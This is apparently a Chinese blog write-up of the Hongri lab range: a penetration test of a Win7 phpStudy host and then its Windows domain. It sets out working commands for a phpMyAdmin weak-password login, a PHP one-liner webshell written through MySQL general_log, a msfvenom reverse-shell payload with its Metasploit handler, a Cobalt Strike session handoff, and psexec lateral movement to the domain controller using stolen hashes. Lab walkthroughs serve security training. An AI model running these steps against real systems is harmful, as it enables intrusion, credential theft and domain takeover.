0x01环境信息
环境下载地址
百度网盘: https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset
密码: 【红日安全】您的下载密码为:n1u2
虚机统计密码hongrisec@2019
这里我为了方便修改为admin.123
网络配置如图所示
![(C:\Users\Administrator\Pictures\image-20211228093143026.png)]](https://img-blog.csdnimg.cn/52f6900546024336901513227232cc01.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA572R57uc5a6J5YWo5bCP55m9Nw==,size_20,color_FFFFFF,t_70,g_se,x_16)
0x02 渗透测试
1、信息收集
打开win7靶机phpStudy
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-41Fr3o9z-1642779154393)(C:\Users\Administrator\Pictures\image-20211226230857673.png)]](https://img-blog.csdnimg.cn/fe8d1254ba1f4e0dbee6af3d9da686be.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA572R57uc5a6J5YWo5bCP55m9Nw==,size_20,color_FFFFFF,t_70,g_se,x_16)
访问http://192.168.52.143/
同时底部存在MySQL数据库连接检测: 输入默认账号密码:root/root
证明弱密码存在
使用御剑扫描敏感目录文件
2、漏洞利用
访问phpmyadmin,使用root/root弱口令登录
使用SQL语句查看是否有无权限
show variables like '%secure_file%';
secure_file_priv 值为 NULL 不能使用into 方法导入shell
我们尝试在日志写 shell ,使用SQL语句开启日志服务
set global general_log = "ON";
查看当前日志: show variables like 'general%';
因为这里我已经修改过了,正常情况下会看到日志所在路径,然后再指定一下日志文件:
set global general_log_file = "C:/phpStudy/www/1.php";
注意是放在www目录下,为了可以正常执行一句话木马
开始写入一句话木马
SELECT '<?php eval($_POST["cmd"]);?>';
成功拿到webshell
另外还有通过扫描目录发现备份文件拿到webshell方法,这里不再重复。
3、内网渗透
现在尝试使用kali自带的msf进行渗透
3.1 制作shell.exe木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.52.128 lport=8888 -f exe >shell.exe
3.2 建立msf连接
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.52.128
lhost => 192.168.52.128
msf exploit(handler) > set lport 8888
lport => 8888
msf exploit(handler) > run
3.3 执行shell.exe,msf成功上线
3.4 提权
getsystem提权
更改编码格式chcp 65001,去除meterpreter乱码
3.5 内网信息搜集
常用域内信息收集命令
ipconfig /all 查询本机IP段,所在域等
net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net user 本机用户列表
net localhroup administrators 本机管理员[通常含有域用户]
net user /domain 查询域用户
net user 用户名 /domain 获取指定用户的账户信息
net user /domain b404 pass 修改域内用户密码,需要管理员权限
net group /domain 查询域里面的工作组
net group 组名 /domain 查询域中的某工作组
net group "domain admins" /domain 查询域管理员列表
net group "domain controllers" /domain 查看域控制器(如果有多台)
net time /domain 判断主域,主域服务器都做时间服务器
ipconfig /all查看内网环境
这里需要说明一点,执行域内信息收集时候总是报错,还是环境的问题
The specified domain either does not exist or could not be contacted.
后来发现是是未配置静态IP,将72段(域所在段)配置成静态IP,即正常
找到域控为OWA,IP地址为192.168.72.132
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PmDCdqGp-1642779154406)(D:\Typora文档\typora-pic\image-20211226002421240.png)]](https://img-blog.csdnimg.cn/adc29baf131a4ef682f487fe867d84b4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA572R57uc5a6J5YWo5bCP55m9Nw==,size_20,color_FFFFFF,t_70,g_se,x_16)
添加路由进行横向移动
run post/multi/manage/autoroute
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1dk53ept-1642779154407)(D:\Typora文档\typora-pic\image-20211228011406110.png)]](https://img-blog.csdnimg.cn/c4cec8d5112b43f2a42edcd837f5a080.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA572R57uc5a6J5YWo5bCP55m9Nw==,size_20,color_FFFFFF,t_70,g_se,x_16)
探测域内存活主机
run windows/gather/enum_ad_computers
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZC4euOsj-1642779154407)(D:\Typora文档\typora-pic\image-20211228010452558.png)]](https://img-blog.csdnimg.cn/e26df4f3278e4ce4a2c432a3f2552cb5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA572R57uc5a6J5YWo5bCP55m9Nw==,size_20,color_FFFFFF,t_70,g_se,x_16)
域控列表
run windows/gather/enum_domains
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PsOlKPir-1642779154408)(D:\Typora文档\typora-pic\image-20211228010646695.png)]](https://img-blog.csdnimg.cn/4daa31e6b02546e69f3c29c4a378af07.png)
0x03内网漫游
在msf操作比较麻烦,直接转到cs处理
msf下的会话传给cs
1、首先把msf上获取到的meterpreter挂在后台运行执行命令:background,即可
2、然后使用 exploit/windows/local/payload_inject来注入一个新的payload到session中,具体命令如下:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST 192.168.10.200 //cs主机地址
set LPORT 9999 //随意设置监听端口,需要和cs保持一致
set session 14 //设置需要派送的meterpreter
set DisablePayloadHandler true //禁止产生一个新的handler
执行run,cs即上线,如下:
查看当前登录域及登录用户信息
shell net config workstation
"工作站域DNS名称"为域名,如果为WORKGROUP表示当前为非域环境
"登录域"表示当前登录的用户是域用户还是本地用户
继续搜集域内基础信息
查询域
shell net view /domain
可能是环境问题,显示还有workgroup
查询 GOD域内全部主机:
shell net view /domain:GOD
执行net view发现域内目标主机及域控
此时目标里面即会出现域控及另一台域内机器
关于 SMB Beacon
SMB Beacon 使用命名管道通过父级 Beacon 进行通讯,当两个 Beacons 链接后,子 Beacon 从父 Beacon 获取到任务并发送。因为链接的 Beacons 使用 Windows 命名管道进行通信,此流量封装在 SMB 协议中,所以 SMB Beacon 相对隐蔽,绕防火墙时可能发挥奇效
SMB Beacon有两种使用方式:
- 直接派生一个孩子,目的为了进一步盗取hash
- 在已有的beacon上创建监听,用来作为跳板进行内网渗透
这里我们使用第二种方式,创建SMB监听:
派生一个新的smb会话
psexec
选择目标域控主机,psexec批量上线
能够使用 psexec 能迅速地获得域控主机的 beacon 是因为在本机中读取到了域管理员账号密码的 hash
同理,使域内其它主机(ROOT-TVI862UBEH)也成功上线
可以获取域控密码
但是在获取域内主机(ROOT-TVI862UBEH)密码时候失败了,不知道是不是因为win2003版本过低的原因,暂时不去探究了,另外也可以转存hash等等
参考:
https://www.cnblogs.com/Cl0ud/p/13769940.html